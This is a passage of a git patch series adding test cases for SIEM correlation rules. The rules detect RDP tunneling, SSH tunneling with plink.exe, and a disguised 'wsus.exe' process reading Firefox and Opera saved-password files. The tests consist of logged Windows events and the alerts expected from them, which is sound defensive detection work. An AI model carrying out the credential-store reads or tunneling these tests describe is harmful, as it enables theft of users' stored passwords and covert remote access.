From f98b3d9c39c6af329b9b8291d2b30af6a1c8bc09 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 10:57:52 +0300 Subject: [PATCH 01/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5FTu?= =?UTF-8?q?nneling)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc | 3 +++ .../mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc | 3 +++ 2 files changed, 6 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc new file mode 100644 index 00000000..8709709a --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_1.sc @@ -0,0 +1,3 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4624\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12544\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T15:26:53.3567809Z\"},\"EventRecordID\":\"5315\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"480\",\"ThreadID\":\"3952\"},\"Channel\":\"Security\",\"Computer\":\"PC02.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"PC02$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"EXAMPLE\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x3e7\"},{\"Name\":\"TargetUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"TargetUserName\",\"text\":\"IEUser\"},{\"Name\":\"TargetDomainName\",\"text\":\"PC02\"},{\"Name\":\"TargetLogonId\",\"text\":\"0x45120\"},{\"Name\":\"LogonType\",\"text\":\"10\"},{\"Name\":\"LogonProcessName\",\"text\":\"User32\"},{\"Name\":\"AuthenticationPackageName\",\"text\":\"Negotiate\"},{\"Name\":\"WorkstationName\",\"text\":\"PC02\"},{\"Name\":\"LogonGuid\",\"text\":\"{00000000-0000-0000-0000-000000000000}\"},{\"Name\":\"TransmittedServices\",\"text\":\"-\"},{\"Name\":\"LmPackageName\",\"text\":\"-\"},{\"Name\":\"KeyLength\",\"text\":\"0\"},{\"Name\":\"ProcessId\",\"text\":\"0x658\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\winlogon.exe\"},{\"Name\":\"IpAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"IpPort\",\"text\":\"49164\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield6": "RemoteInteractive", "datafield9": "Negotiate", "dst.fqdn": "pc02.example.corp", "dst.host": "pc02.example.corp", "dst.hostname": "pc02", "event_src.category": "AAA", "event_src.fqdn": "pc02.example.corp", "event_src.host": "pc02.example.corp", "event_src.hostname": "pc02", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4624_An_account_was_successfully_logged_on", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_auth_method": "remote", "logon_service": "User32", "logon_type": 10, "mime": "application/x-pt-eventlog", "msgid": "4624", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T21:05:50.597Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49164, "status": "success", "subject": "account", "subject.account.domain": "pc02", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.session_id": "282912", "subject.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "subject.process.id": "1624", "subject.process.name": "winlogon.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T15:26:53.356Z", "type": "raw", "uuid": "8a33a9cc-4609-43b5-aa3f-4d468a296ce2"} + +expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling", "correlation_type": "incident", "dst.fqdn": "pc02.example.corp", "dst.host": "pc02.example.corp", "dst.hostname": "pc02", "event_src.category": "AAA", "event_src.host": "pc02.example.corp", "event_src.hostname": "pc02", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "logon_auth_method": "remote", "logon_service": "User32", "logon_type": 10, "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49164, "status": "success", "subject": "account", "subject.account.domain": "pc02", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.session_id": "282912", "subject.process.fullpath": "c:\\windows\\system32\\winlogon.exe", "subject.process.id": "1624", "subject.process.name": "winlogon.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc new file mode 100644 index 00000000..d5592e37 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling/tests/test_2.sc @@ -0,0 +1,3 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-TerminalServices-RemoteConnectionManager\",\"Guid\":\"{c76baa63-ae81-421c-b425-340b4b24157f}\"},\"EventID\":\"1149\",\"Version\":\"0\",\"Level\":\"4\",\"Task\":\"0\",\"Opcode\":\"0\",\"Keywords\":\"0x1000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T18:04:57.4523864Z\"},\"EventRecordID\":\"228\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1280\",\"ThreadID\":\"2748\"},\"Channel\":\"Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational\",\"Computer\":\"PC01.example.corp\",\"Security\":{\"UserID\":\"S-1-5-20\"}},\"UserData\":{\"EventXML\":{\"xmlns:auto-ns2\":\"2>http://schemas.microsoft.com/win/2004/08/events\",\"xmlns\":\"Event_NS\",\"Param1\":\"admin01\",\"Param2\":\"example\",\"Param3\":\"127.0.0.1\"}}}}", "category.generic": "Access", "category.high": "Authentication", "category.low": "Remote", "event_src.category": "Terminal services", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "1149_User_authentication_succeeded", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1149", "normalized": true, "object": "system", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T21:55:11.504Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.name": "admin01", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T18:04:57.452Z", "type": "raw", "uuid": "8b82ace1-015d-45a5-8be0-552b37fceb60"} + +expect 1 {"action": "login", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling", "correlation_type": "incident", "event_src.category": "Terminal services", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.category": "Undefined", "incident.severity": "medium", "object": "system", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.name": "admin01"} \ No newline at end of file From a52fe44b75da2475d67737f0c1b1f0479e6a6a03 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 11:13:50 +0300 Subject: [PATCH 02/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(RDP=5FTu?= =?UTF-8?q?nneling=5Fvia=5FSSH=5F5156)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../RDP_Tunneling_via_SSH_5156/tests/test_1.sc | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc new file mode 100644 index 00000000..1eeceb36 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_comm_and_ctrl/RDP_Tunneling_via_SSH_5156/tests/test_1.sc @@ -0,0 +1,3 @@ +{"action": "allow", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5156\",\"Version\":\"1\",\"Level\":\"0\",\"Task\":\"12810\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-02-13T18:04:01.6321208Z\"},\"EventRecordID\":\"227727\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"PC01.example.corp\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"ProcessID\",\"text\":\"3324\"},{\"Name\":\"Application\",\"text\":\"\\\\device\\\\harddiskvolume1\\\\users\\\\user01\\\\desktop\\\\plink.exe\"},{\"Name\":\"Direction\",\"text\":\"%%14593\"},{\"Name\":\"SourceAddress\",\"text\":\"127.0.0.1\"},{\"Name\":\"SourcePort\",\"text\":\"49271\"},{\"Name\":\"DestAddress\",\"text\":\"127.0.0.2\"},{\"Name\":\"DestPort\",\"text\":\"3389\"},{\"Name\":\"Protocol\",\"text\":\"6\"},{\"Name\":\"FilterRTID\",\"text\":\"0\"},{\"Name\":\"LayerName\",\"text\":\"%%14611\"},{\"Name\":\"LayerRTID\",\"text\":\"48\"},{\"Name\":\"RemoteUserID\",\"text\":\"S-1-0-0\"},{\"Name\":\"RemoteMachineID\",\"text\":\"S-1-0-0\"}]}}}", "category.generic": "Connection", "category.high": "Network Interaction Management", "category.low": "Control", "datafield5": "48", "direction": "egress", "dst.host": "127.0.0.2", "dst.ip": "127.0.0.2", "dst.port": 3389, "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5156_WFP_has_permitted_connection", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5156", "normalized": true, "object": "connection", "object.process.fullpath": "\\device\\harddiskvolume1\\users\\user01\\desktop\\plink.exe", "object.process.id": "3324", "object.process.name": "plink.exe", "object.process.path": "\\device\\harddiskvolume1\\users\\user01\\desktop\\", "object.property": "ALE layer", "object.value": "Connect", "protocol": "6", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T21:30:19.331Z", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49271, "status": "success", "subject": "rule", "subject.id": "0", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-02-13T18:04:01.632Z", "type": "raw", "uuid": "dc4c60bd-251a-4238-94bb-1d308a36fb43"} + +expect 1 {"action": "start", "category.generic": "Attack", "category.high": "Command and Control", "category.low": "Protocol Tunneling", "correlation_name": "RDP_Tunneling_via_SSH_5156", "correlation_type": "event", "direction": "egress", "dst.host": "127.0.0.2", "dst.ip": "127.0.0.2", "dst.port": 3389, "event_src.category": "Operating system", "event_src.fqdn": "pc01.example.corp", "event_src.host": "pc01.example.corp", "event_src.hostname": "pc01", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "object": "process", "object.process.fullpath": "\\device\\harddiskvolume1\\users\\user01\\desktop\\plink.exe", "object.process.id": "3324", "object.process.name": "plink.exe", "object.process.path": "\\device\\harddiskvolume1\\users\\user01\\desktop\\", "protocol": "6", "src.host": "127.0.0.1", "src.ip": "127.0.0.1", "src.port": 49271, "status": "success", "subject": "account"} From 1533d6406ddda2a6b239112acdf9bbc3355fbeeb Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Thu, 27 Jul 2023 13:27:04 +0300 Subject: [PATCH 03/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Chrome?= =?UTF-8?q?=5Ffirefox=5Fopera=5Fcred=5Fread)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Chrome_firefox_opera_cred_read/tests/test_1.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_2.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_3.sc | 4 ++++ .../Chrome_firefox_opera_cred_read/tests/test_4.sc | 6 ++++++ 4 files changed, 18 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc new file mode 100644 index 00000000..5ebb4973 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_1.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:05.3081880Z\"},\"EventRecordID\":\"4989\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\key4.db\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\key4.db", "object.name": "key4.db", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T11:47:59.229Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:05.308Z", "type": "raw", "uuid": "ab468aaa-cc07-45a7-b407-d7cd53928174"} +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T11:47:59.230Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "1594673e-8a1f-41aa-81af-dd9dc3f73331"} + +expect 2 {"action": "read", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc new file mode 100644 index 00000000..03f4760f --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_2.sc @@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:31:15.3550630Z\"},\"EventRecordID\":\"4988\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"68\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Opera Software\\\\Opera Stable\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:25:48.782Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:31:15.355Z", "type": "raw", "uuid": "1195b590-34e4-4b68-9ab5-225793f7be13"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "read", "alert.context": "iewin7\\ieuser read 'c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data' on iewin7", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git 